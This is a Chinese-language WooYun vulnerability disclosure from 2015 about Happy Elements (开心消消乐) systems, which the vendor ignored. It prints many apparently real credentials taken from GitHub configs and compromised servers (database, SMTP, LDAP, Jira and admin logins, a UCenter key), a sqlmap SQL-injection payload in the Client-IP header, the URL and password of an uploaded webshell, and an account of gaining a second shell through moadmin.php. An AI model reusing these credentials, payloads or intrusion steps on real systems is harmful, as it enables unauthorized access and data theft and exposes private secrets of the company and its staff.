当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143807

漏洞标题:乐元素多处安全漏洞打包以及多个shell(数据可直接泄漏)

相关厂商:happyelements.cn

漏洞作者: mango

提交时间:2015-09-29 11:24

修复时间:2015-10-12 20:26

公开时间:2015-10-12 20:26

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

女朋友非常喜欢玩开心消消乐~~还非常喜欢小黄鸡的抱枕~~~求送个~~~~

详细说明:

先说说 github上面的信息泄露吧
https://github.com/jiangkunwei/dc/blob/9778fb5f182a0dde6f36cf95bdfc8279eb74ec88/config/config.php

),
//mysql config
'mysqlConfig' => array (
'host' => 'da.happyelements.com',
'dbuser' => 'alex',
'dbpass' => 'myanotherdatacenter',
'dbname' => array (
'diamond' => 'da_uiue',
'stat' => 'stat',


支持外联哦~

WOBAZW{3RAZA~%1%WCRIKA4.png


https://github.com/gaitian/project/blob/97d02946eab3e3f18aeef6f97702eb9c0295748e/trunk/protected/config/params.php

'CharSet' => 'UTF-8',
//'Encoding' => 'BASE64',
'SMTPAuth' => true,
'SMTPSecure' => 'tls',
'SMTPDebug' => 1,
'Host' => 'smtp.office365.com',
'Port' => '587',
'Username' => 'it_admin@happyelements.com',
'Password' => 'tlt1234$',


4XPRWFKC1S6[D2D%Z@T732U.png


再说个注入问题
http://fansclub.happyelements.com:80/fans/qa.php
这个是开心消消乐APP里面的链接 是客服里面的常见问题
Client-IP 存在注入哦

sqlmap identified the following injection points with a total of 106 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))PLSm) AND 'wOlE'='wOlE
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] bb
[*] community
[*] fans
[*] information_schema
[*] mg
[*] wx


K`}LB7V`F~124MG}K0KR2QT.png


其中 还影响 http://ff.happyelements.com/index.php/admin/nodes admin 1234qwer!

)1[SYR]G7P)Z%I8MCQ[QFEK.png

漏洞证明:

来说说getshell
http://admin.happyelements.net/blog/ 是wp模版 存在弱口令 admin 123456

)5@){N6OI)5(2_@@QX2HSXI.png


通过上传webshell获得权限
http://admin.happyelements.net/blog/wp-content/uploads/2015/09/0.php 密码a

C2BFZRB}IBLB@@M3C]_T[MC.png


在这 翻到一些数据哦

peng.shan 111111
zhangli
123456
12345678
1234qwer!
cacti admin 1qaz!@#$
111111
12345678
1234qwer!

这个基本上是管理员通用的密码咯
还发现了ldap

define("LDAP_SERVER","10.130.130.10");    //120.56");
define("LDAP_PORT",389);
define("AUTH_USER",'hec\ad_operator');
define("AUTH_PASS",'happy-fish_it123');
define("BASE_DN","OU=hec,DC=hec,DC=intra");


("odbc:Driver=FreeTDS;Server=10.130.150.171;Port=1433;Database=middata2015;Tds_version=7.0;Uid=sa;Pwd=sa;");

'url' => 'http://leave.happyelements.net/',
'smtp' => array (
'CharSet' => 'UTF-8',
'Encoding' => 'BASE64',
'SMTPAuth' => true,
'SMTPSecure' => 'TLS',
'Host' => 'mail.happyelements.com',
'Port' => '587',
'Username' => 'leave_admin',
'Password' => '1234qwer!',
),


又发现帐号~~登陆一下试试

@3U_JJS0TU3R2QA9LDNB`5C.png


~$VF4VDF29WE(06}[LO737X.png


ULR`D8B10N0EH5)OSR6DVPD.jpg


WOCUB]VRO0Z9MA{H[F@DB{B.jpg


YCDB8Q%VWZQP1)HV2LPWEQ8.png


第二个shell
http://fc.happyelements.com/
是客服系统
存在moadmin.php 之前就被爆两个命令执行

6QVAH18SP$`]8D%{0$EZ3AY.png


%%AZ]`(Y[77YL$XIQO9@2@O.png


成功shell
下面是一些数据哦~

'From'          => 'support_user@happyelements.com',
'FromName' => 'SupportUser',
'Username' => 'support_user@happyelements.com',
'Password' => 'Hemail@2015',
'Host' => 'smtp.office365.com',
'host' => '10.20.53.15',
'user' => 'jira_cc',
'pass' => 'CC_to_Jira#',
'name' => 'jiradb',
'charset' => 'utf8',
'source' => 'jira_us',return array (
'jira_cn' => array(
'host' => '50.22.154.190',
'user' => 'gsp_fc_db',
'pass' => 'gsp_fc_1234qwer!',
'name' => 'jiradb',
'charset' => 'utf8',
'source' => 'jira_us', //key
'api' => 'http://fc.happyelements.com/jira/api',

'domain' => 'http://jira.us.happyelements.com:8888/rest/jconnect/service/issue/comment/', //绂忔澗鏂版敼鐨?

'pay_log' => 'http://w9.fortuna.happyelements.com/getUserLastPayLog.jsp',
'api' => 'http://fc.happyelements.com/jira/api',
'domain' => 'http://jira.us.happyelements.com:8888',
'pay_log' => 'http://w9.fortuna.happyelements.com/getUserLastPayLog.jsp',
);
*/
/*
'paopaocat' => array(
'username' => 2202410931,
'passwd' => 'ppmmp@2013',
'token' => 'happyfishFC',
),
*/
'happyfish' => array(
'username' => 2506103974,
'passwd' => 'happyfishmp2012',
'token' => 'happyfishFC',
),
);
'server' =>'http://jira.us.happyelements.com:8888/rpc/soap/jirasoapservice-v2?wsdl',
'username' =>'fcuser1',
'password' =>'1234qwer!',
);define('UC_DBHOST', '10.130.100.101');
define('UC_DBUSER', 'bbs_fish_tw');
define('UC_DBPW', 'bbsfishtw');
define('UC_DBNAME', 'bbs_tw');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`bbs_tw`.tw_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '4eW1V09726Mb06f3N2a5de3enbj0N137n7i2Q6lab6p6q4l9a3Z8P6X91984n89d');
define('UC_API', 'http://bbs.hfish.tw/uc_server');
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);


support_user 可以登录的 我就不帖图片了~

修复方案:

求抱枕~~我送妹子~~~~~求抱枕砸死我~~~

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-12 20:26

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-29 11:25 | 随风的风 ( 普通白帽子 | Rank:131 漏洞数:48 | [code]心若没有栖息的地方,走到哪里都是在...)

    最多5 rank,超过10rank,楼下直播吃屎。

  2. 2015-09-29 11:28 | 牛 小 帅 ( 普通白帽子 | Rank:399 漏洞数:89 | 什么狗屁爱,生活已乱套!人的一生中,...)

    不是我,是他↓↓↓